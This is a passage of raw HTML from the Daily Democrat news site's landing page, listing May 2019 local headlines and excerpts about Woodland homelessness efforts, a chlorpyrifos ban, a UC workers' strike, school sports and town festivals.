class="image-wrapper"><img alt="Public, private collaborations formed to combat homelessness in Woodland" title="Public, private collaborations formed to combat homelessness in Woodland" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/COUNCILHOMELESS2.jpg?w=279" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/COUNCILHOMELESS2.jpg?w=279 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/COUNCILHOMELESS2.jpg?w=320 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/COUNCILHOMELESS2.jpg?w=331 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/COUNCILHOMELESS2.jpg?w=395 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/COUNCILHOMELESS2.jpg?w=256 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/public-private-collaborations-formed-to-combat-homelessness/" title="Public, private collaborations formed to combat homelessness in Woodland"> <span class="dfm-title"> Public, private collaborations formed to combat homelessness in Woodland </span> </a> </h5> </header> </div><!-- .article-info --> </article> </div> </div> <div class="headline-list"> <h2 class="headline-list-title"><span>Latest Headlines</span></h2> <ul> <li class="headline-feature-secondary"> <article class="slideshow headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587210" data-timestamp="1557851722"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/14/county-students-learn-local-history-at-gibson-house/" title="County students learn local history at Gibson House" class="icon-slideshow"></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/14/county-students-learn-local-history-at-gibson-house/" title="County students learn local history at Gibson House"> <span class="dfm-title"> County students learn local history at Gibson House </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-14 16:35:22">2 days ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="headline-feature-secondary"> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587601" data-timestamp="1557922744"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/yolobus-encourages-people-to-ride-their-bicycles-in-may/" title="Yolobus encourages people to ride their bicycles in May" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/yolobus-encourages-people-to-ride-their-bicycles-in-may/" title="Yolobus encourages people to ride their bicycles in May"> <span class="dfm-title"> Yolobus encourages people to ride their bicycles in May </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-15 12:19:04">21 hours ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="headline-feature-secondary"> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587850" data-timestamp="1557997842"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/man-exonerated-after-17-years-in-prison-for-2002-san-jose-shooting/" title="‘We would not give up’: Man exonerated after 17 years in prison for 2002 California shooting" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/man-exonerated-after-17-years-in-prison-for-2002-san-jose-shooting/" title="‘We would not give up’: Man exonerated after 17 years in prison for 2002 California shooting"> <span class="dfm-title"> ‘We would not give up’: Man exonerated after 17 years in prison for 2002 California shooting </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-16 09:10:42">18 mins ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="headline-feature-secondary"> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587839" data-timestamp="1557993938"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/its-going-to-be-a-bad-spring-for-ticks-fleas-california/" title="It’s going to be a bad spring for ticks and fleas" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/its-going-to-be-a-bad-spring-for-ticks-fleas-california/" title="It’s going to be a bad spring for ticks and fleas"> <span class="dfm-title"> It’s going to be a bad spring for ticks and fleas </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-16 08:05:38">1 hour ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="headline-feature-secondary"> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587830" data-timestamp="1557993199"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/people-receiving-state-cash-assistance-can-now-also-get-food-stamps/" title="People receiving cash assistance can now also get food stamps" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/people-receiving-state-cash-assistance-can-now-also-get-food-stamps/" title="People receiving cash assistance can now also get food stamps"> <span class="dfm-title"> People receiving cash assistance can now also get food stamps </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-16 07:53:19">2 hours ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="headline-feature-secondary"> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587823" data-timestamp="1557992817"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/alabama-governor-invokes-god-in-banning-nearly-all-abortions/" title="Alabama governor invokes God in banning nearly all abortions" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/alabama-governor-invokes-god-in-banning-nearly-all-abortions/" title="Alabama governor invokes God in banning nearly all abortions"> <span class="dfm-title"> Alabama governor invokes God in banning nearly all abortions </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-16 07:46:57">2 hours ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="headline-feature-secondary"> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587798" data-timestamp="1557990051"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/volunteering-helps-californias-seniors-find-purpose-later-in-life/" title="Volunteering helps California&#8217;s seniors find purpose later in life" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/volunteering-helps-californias-seniors-find-purpose-later-in-life/" title="Volunteering helps California&#8217;s seniors find purpose later in life"> <span class="dfm-title"> Volunteering helps California&#8217;s seniors find purpose later in life </span> </a> </h6> <div class="entry-meta"> <time datetime="2019-05-16 07:00:51">2 hours ago</time> </div><!-- .entry-meta --> </header> </div><!-- .article-info --> </article> </li> <li class="social-links"> <div class="newsletter-simple"> <div class="newsletter-item"> <p class="prompt">Sign up for email newsletters</p> <a href="https://www.dailydemocrat.com/newsletter/"> Subscribe</a> </div> </div> <div class="share-with-prompt"> <span class="prompt">Follow Us</span> <ul class="sharing"> <li> <a href="https://facebook.com/dailydemocrat" target="self" class="icon-facebook"> <span class="label">Facebook</span> </a> </li> <li> <a href="https://twitter.com/woodlandnews" target="self" class="icon-twitter"> <span class="label">Twitter</span> </a> </li> <li> <a href="https://instagram.com/thedailydemocrat" target="self" class="icon-instagram"> <span class="label">Instagram</span> </a> </li> <li> <a href="https://www.dailydemocrat.com/feed/" target="self" class="icon-feed"> <span class="label">RSS</span> </a> </li> </ul> </div> </li> </ul> </div> </div> <aside class="sidebar-ad-container"> <div id="div-gpt-ad-Cube1_RRail_ATF" class="dfp-ad dfp-Cube1_RRail_ATF" data-ad-unit="Cube1_RRail_ATF"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-Cube1_RRail_ATF"); } ); } </script> </div> </aside> </section> <div id="div-gpt-ad-Sponsorship_2" class="dfp-ad dfp-Sponsorship_2" data-ad-unit="Sponsorship_2"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-Sponsorship_2"); } ); } </script> </div> <div data-stackid="b02e4c0fd0a147dcd940bf6af4ef2af6" class="dml-widget-container"></div> <div class="landing-three-one"> <div class="three-one-left"> <div class="popular widget-popular-stories"><section class="popular section" id="most-popular-stories"> <h2 class="widget-title"> <span>Most Popular</span> </h2> <ol> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/16/people-receiving-state-cash-assistance-can-now-also-get-food-stamps/"> <span class="dfm-title"> People receiving cash assistance can now also get food stamps </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/15/back-to-the-street-car-show-brings-thousands-downtown-photo-gallery/"> <span class="dfm-title"> &#8216;Back to the Street&#8217; car show brings thousands downtown | Photo Gallery </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/15/finalists-for-woodland-community-college-president-position-interviewed/"> <span class="dfm-title"> Finalists for Woodland Community College president position interviewed </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/15/rain-forces-change-of-locations-for-esprit-and-police-memorial-ceremony/"> <span class="dfm-title"> Rain forces change of locations for Esprit and police memorial ceremony </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/16/authorities-2-pilots-killed-as-crop-dusting-planes-collide/"> <span class="dfm-title"> 2 pilots killed as crop-dusting planes collide in Yuba County </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/15/pioneer-bats-come-alive-in-playoff/"> <span class="dfm-title"> Pioneer bats come alive in playoffs </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/15/walnut-park-has-amenities-everyone-can-enjoy/"> <span class="dfm-title"> Walnut Park has amenities everyone can enjoy </span> </a> </li> <li class="entry-title"> <a class="article-title" href="http://www.dailydemocrat.com/2019/05/15/public-private-collaborations-formed-to-combat-homelessness/"> <span class="dfm-title"> Public, private collaborations formed to combat homelessness in Woodland </span> </a> </li> </ol> </section> </div> </div> <div class="three-one-right"> <div id="div-gpt-ad-Cube2_RRail_mid" class="dfp-ad dfp-Cube2_RRail_mid" data-ad-unit="Cube2_RRail_mid"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-Cube2_RRail_mid"); } ); } </script> </div> </div> </div> <div class="landing-row landing-four-up"> <div class="landing-item"> <section class="section-highlight"> <h2 class="entry-title"> <a href="https://www.dailydemocrat.com/news/local-news/"> Local News<i class="icon-arrow-right"></i> </a> </h2> <div class="section-highlight-content"> <div class="section-feature"> <article class="feature-medium feature-large archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587251" data-timestamp="1557996055"> <figure> <a href="https://www.dailydemocrat.com/2019/05/16/farmers-face-future-without-chlorpyrifos/" title="Farmers face future without chlorpyrifos" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/16/farmers-face-future-without-chlorpyrifos/" title="Farmers face future without chlorpyrifos"> <div class="image-wrapper"><img src="https://www.dailydemocrat.com/wp-content/uploads/2018/08/WDD-Filler-Photo.png" alt="Farmers face future without chlorpyrifos" title="Farmers face future without chlorpyrifos" /></div> </a> </figure> <div class="article-info"> <header> <h2 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/farmers-face-future-without-chlorpyrifos/" title="Farmers face future without chlorpyrifos"> <span class="dfm-title"> Farmers face future without chlorpyrifos </span> </a> </h2> </header> <div class="excerpt"> As farmers deal with the fallout of California’s decision to outlaw chlorpyrifos, the governor’s May budget revision threw them a bone. Along with the impending ban, CalEPA and the California Department of Food and Agriculture announced that Gov. Gavin Newsom will ask the Legislature for $5.7 million to fund research into alternatives and assemble a working group to evaluate and... </div> </div><!-- .article-info --> </article> </div> <ul class="headline-list"> <li> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587837" data-timestamp="1557994433"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/saving-california-to-host-redistricting-forum-in-davis/" title="&#8216;Saving California&#8217; to host redistricting forum in Davis" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/saving-california-to-host-redistricting-forum-in-davis/" title="&#8216;Saving California&#8217; to host redistricting forum in Davis"> <span class="dfm-title"> &#8216;Saving California&#8217; to host redistricting forum in Davis </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587211" data-timestamp="1557981345"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/16/the-daily-democrats-bulletin-board-of-coming-events-91/" title="The Daily Democrat’s Bulletin Board of Coming Events" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/the-daily-democrats-bulletin-board-of-coming-events-91/" title="The Daily Democrat’s Bulletin Board of Coming Events"> <span class="dfm-title"> The Daily Democrat’s Bulletin Board of Coming Events </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587354" data-timestamp="1557926719"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/woodland-residents-urged-to-attend-emergency-evacuation-meetings/" title="Woodland residents urged to attend emergency evacuation meetings" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/woodland-residents-urged-to-attend-emergency-evacuation-meetings/" title="Woodland residents urged to attend emergency evacuation meetings"> <span class="dfm-title"> Woodland residents urged to attend emergency evacuation meetings </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> </div> <div class="landing-item"> <section class="section-highlight"> <h2 class="entry-title"> <a href="https://www.dailydemocrat.com/news/business/"> Business<i class="icon-arrow-right"></i> </a> </h2> <div class="section-highlight-content"> <div class="section-feature"> <article class="feature-medium feature-large archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587865" data-timestamp="1557998504"> <figure> <a href="https://www.dailydemocrat.com/2019/05/16/uc-workers-to-strike-thursday-over-outsourcing-of-jobs/" title="UC workers to strike Thursday over outsourcing of jobs" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/16/uc-workers-to-strike-thursday-over-outsourcing-of-jobs/" title="UC workers to strike Thursday over outsourcing of jobs"> <div class="image-wrapper"><img alt="UC workers to strike Thursday over outsourcing of jobs" title="UC workers to strike Thursday over outsourcing of jobs" class="lazyload size-section_three_one_alt" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/0515_BUS_OCR-L-STRIKE.jpg?w=525" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/0515_BUS_OCR-L-STRIKE.jpg?w=525 620w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/0515_BUS_OCR-L-STRIKE.jpg?w=642 780w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/0515_BUS_OCR-L-STRIKE.jpg?w=510 605w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/0515_BUS_OCR-L-STRIKE.jpg?w=354 420w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/0515_BUS_OCR-L-STRIKE.jpg?w=398 470w" ></div> </a> </figure> <div class="article-info"> <header> <h2 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/uc-workers-to-strike-thursday-over-outsourcing-of-jobs/" title="UC workers to strike Thursday over outsourcing of jobs"> <span class="dfm-title"> UC workers to strike Thursday over outsourcing of jobs </span> </a> </h2> </header> <div class="excerpt"> Thousands of University of California workers staged a strike Thursday at 10 California campuses and five medical centers throughout the state to protest the school’s outsourcing of jobs. The employees — which range from custodians and food service workers to nursing aides and respiratory therapists — are represented by the American Federation of State, County and Municipal Employees, Local 3299.... </div> </div><!-- .article-info --> </article> </div> <ul class="headline-list"> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2575535" data-timestamp="1557917871"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/renovations-underway-at-preserve/" title="Renovations underway at Preserve" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/renovations-underway-at-preserve/" title="Renovations underway at Preserve"> <span class="dfm-title"> Renovations underway at Preserve </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587509" data-timestamp="1557903611"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/how-will-californias-aging-residents-get-around-tackling-transit-for-isolated-seniors/" title="How will California&#8217;s aging residents get around? Tackling transit for isolated seniors" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/how-will-californias-aging-residents-get-around-tackling-transit-for-isolated-seniors/" title="How will California&#8217;s aging residents get around? Tackling transit for isolated seniors"> <span class="dfm-title"> How will California&#8217;s aging residents get around? Tackling transit for isolated seniors </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587487" data-timestamp="1557897278"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/2-billion-judgment-against-monsanto-may-be-the-tip-of-the-iceberg-as-flood-of-lawsuits-loom/" title="$2 billion judgment against Monsanto may be the tip of the iceberg" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/2-billion-judgment-against-monsanto-may-be-the-tip-of-the-iceberg-as-flood-of-lawsuits-loom/" title="$2 billion judgment against Monsanto may be the tip of the iceberg"> <span class="dfm-title"> $2 billion judgment against Monsanto may be the tip of the iceberg </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> </div> <div class="landing-item"> <section class="section-highlight"> <h2 class="entry-title"> <a href="https://www.dailydemocrat.com/sports/local-sports/"> Local Sports<i class="icon-arrow-right"></i> </a> </h2> <div class="section-highlight-content"> <div class="section-feature"> <article class="feature-medium feature-large archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587650" data-timestamp="1557933851"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/hjerpe-throws-fourth-no-hitter-to-lead-woodland-in-playoff-opener/" title="Hjerpe throws fourth no-hitter to lead Woodland in playoff opener" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/15/hjerpe-throws-fourth-no-hitter-to-lead-woodland-in-playoff-opener/" title="Hjerpe throws fourth no-hitter to lead Woodland in playoff opener"> <div class="image-wrapper"><img src="https://www.dailydemocrat.com/wp-content/uploads/2018/08/WDD-Filler-Photo.png" alt="Hjerpe throws fourth no-hitter to lead Woodland in playoff opener" title="Hjerpe throws fourth no-hitter to lead Woodland in playoff opener" /></div> </a> </figure> <div class="article-info"> <header> <h2 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/hjerpe-throws-fourth-no-hitter-to-lead-woodland-in-playoff-opener/" title="Hjerpe throws fourth no-hitter to lead Woodland in playoff opener"> <span class="dfm-title"> Hjerpe throws fourth no-hitter to lead Woodland in playoff opener </span> </a> </h2> </header> <div class="excerpt"> Even in the playoffs, Cooper Hjerpe continues to add chapters to what is already a storied high school career. The Wolves' lanky left-hander threw his fourth no-hitter of the season on Tuesday to lead Woodland to a 5-0 win over Marysville in their playoff opener. Hjerpe struck out 16 and walked just two while throwing 100 pitches. Hjerpe's start on... </div> </div><!-- .article-info --> </article> </div> <ul class="headline-list"> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587359" data-timestamp="1557933541"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/15/pioneer-bats-come-alive-in-playoff/" title="Pioneer bats come alive in playoffs" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/pioneer-bats-come-alive-in-playoff/" title="Pioneer bats come alive in playoffs"> <span class="dfm-title"> Pioneer bats come alive in playoffs </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view no-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587324" data-timestamp="1557844983"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/14/softball-playoffs-open-with-woodland-christian-advancing-pioneer-knocked-out/" title="Softball playoffs open with Woodland Christian advancing, Pioneer knocked out" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/14/softball-playoffs-open-with-woodland-christian-advancing-pioneer-knocked-out/" title="Softball playoffs open with Woodland Christian advancing, Pioneer knocked out"> <span class="dfm-title"> Softball playoffs open with Woodland Christian advancing, Pioneer knocked out </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> <li> <article class=" headline-only archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2586571" data-timestamp="1557591139"> <div class="article-info"> <header> <a href="https://www.dailydemocrat.com/2019/05/11/uc-davis-football-alums-share-experiences-at-junior-day/" title="UC Davis football alums share experiences at Junior Day" class=""></a> <h6 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/11/uc-davis-football-alums-share-experiences-at-junior-day/" title="UC Davis football alums share experiences at Junior Day"> <span class="dfm-title"> UC Davis football alums share experiences at Junior Day </span> </a> </h6> </header> </div><!-- .article-info --> </article> </li> </ul> </div> </section> </div> <div class="landing-item"> </div> </div> <div class="landing-three-one landing-row"> <div class="three-one-right"> <div id="div-gpt-ad-Cube3_RRail_lower" class="dfp-ad dfp-Cube3_RRail_lower" data-ad-unit="Cube3_RRail_lower"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-Cube3_RRail_lower"); } ); } </script> </div><div class="swappable swap-ad swap-ad-lower" data-swap-location=".feature-video" data-swap-method="after" data-swap-max="m"><div id="div-gpt-ad-Cube3_RRail_lower" class="dfp-ad dfp-Cube3_RRail_lower" data-ad-unit="Cube3_RRail_lower"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-Cube3_RRail_lower"); } ); } </script> </div></div> </div> <div class="three-one-left"> <section class="feature-media feature-video"> <div class="media-content slideshow-landing"> <h2 class="widget-title"><a href="/tag/photos-and-videos/"><span>Photos and Videos<i class="icon-arrow-right"></i></span></a></h2> <ul class="media-articles"> <li class="media-feature-primary"> <article class="slideshow feature-large archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2585292" data-timestamp="1557226140"> <figure> <a href="https://www.dailydemocrat.com/2019/05/07/honey-festival-brings-thousands-downtown-photo-gallery/" title="Honey Festival brings thousands downtown | Photo Gallery" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/07/honey-festival-brings-thousands-downtown-photo-gallery/" title="Honey Festival brings thousands downtown | Photo Gallery"> <div class="image-wrapper"><img alt="Honey Festival brings thousands downtown | Photo Gallery" title="Honey Festival brings thousands downtown | Photo Gallery" class="lazyload size-media_feature" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/HONEYGALLERY9.jpg?w=507" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/HONEYGALLERY9.jpg?w=507 600w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/HONEYGALLERY9.jpg?w=760 760w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/HONEYGALLERY9.jpg?w=585 695w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/HONEYGALLERY9.jpg?w=443 525w" ></div> </a> </figure> <div class="article-info"> <header> <h2 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/07/honey-festival-brings-thousands-downtown-photo-gallery/" title="Honey Festival brings thousands downtown | Photo Gallery"> <span class="dfm-title"> Honey Festival brings thousands downtown | Photo Gallery </span> </a> </h2> </header> <div class="excerpt"> Click here if you are on mobile and cannot see this gallery. Thousands of visitors swarmed downtown Woodland for the California Honey Festival this past Saturday. Now in its third year, the festival’s mission is to promote honey and honey bees and their products to a broader public. Booths featuring information about the importance of bees lined Main Street, stretching... </div> </div><!-- .article-info --> </article> </li> <li class="media-feature-secondary"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2585326" data-timestamp="1557231439"> <figure> <a href="https://www.dailydemocrat.com/2019/05/07/farm-connection-day-returns-photo-gallery/" title="Farm Connection Day returns | Photo Gallery" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/07/farm-connection-day-returns-photo-gallery/" title="Farm Connection Day returns | Photo Gallery"> <div class="image-wrapper"><img alt="Farm Connection Day returns | Photo Gallery" title="Farm Connection Day returns | Photo Gallery" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/FACESFARM2.jpg?w=249" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/FACESFARM2.jpg?w=249 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FACESFARM2.jpg?w=287 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FACESFARM2.jpg?w=296 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FACESFARM2.jpg?w=353 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/FACESFARM2.jpg?w=229 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/07/farm-connection-day-returns-photo-gallery/" title="Farm Connection Day returns | Photo Gallery"> <span class="dfm-title"> Farm Connection Day returns | Photo Gallery </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-secondary"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2582918" data-timestamp="1556716473"> <figure> <a href="https://www.dailydemocrat.com/2019/05/01/woodland-celtic-games-seem-to-be-a-hit-photo-gallery/" title="Woodland Celtic Games seem to be a hit | Photo Gallery" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/05/01/woodland-celtic-games-seem-to-be-a-hit-photo-gallery/" title="Woodland Celtic Games seem to be a hit | Photo Gallery"> <div class="image-wrapper"><img alt="Woodland Celtic Games seem to be a hit | Photo Gallery" title="Woodland Celtic Games seem to be a hit | Photo Gallery" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/04/CELTICGAMES21.jpg?w=275" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/04/CELTICGAMES21.jpg?w=275 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CELTICGAMES21.jpg?w=317 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CELTICGAMES21.jpg?w=327 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CELTICGAMES21.jpg?w=390 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/04/CELTICGAMES21.jpg?w=253 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/01/woodland-celtic-games-seem-to-be-a-hit-photo-gallery/" title="Woodland Celtic Games seem to be a hit | Photo Gallery"> <span class="dfm-title"> Woodland Celtic Games seem to be a hit | Photo Gallery </span> </a> </h5> </header> </div><!-- .article-info --> </article> </li> <li class="media-feature-secondary"> <article class="slideshow feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2562880" data-timestamp="1551177917"> <figure> <a href="https://www.dailydemocrat.com/2019/02/26/photos-woodland-bridal-show-returns/" title="PHOTOS: Woodland Bridal Show returns" class="icon-slideshow"></a> <a href="https://www.dailydemocrat.com/2019/02/26/photos-woodland-bridal-show-returns/" title="PHOTOS: Woodland Bridal Show returns"> <div class="image-wrapper"><img alt="PHOTOS: Woodland Bridal Show returns" title="PHOTOS: Woodland Bridal Show returns" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/02/BRIDALGALLERY6.jpg?w=281" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/02/BRIDALGALLERY6.jpg?w=281 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/02/BRIDALGALLERY6.jpg?w=323 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/02/BRIDALGALLERY6.jpg?w=333 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/02/BRIDALGALLERY6.jpg?w=398 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/02/BRIDALGALLERY6.jpg?w=258 305w" ></div> </a> </figure> <div 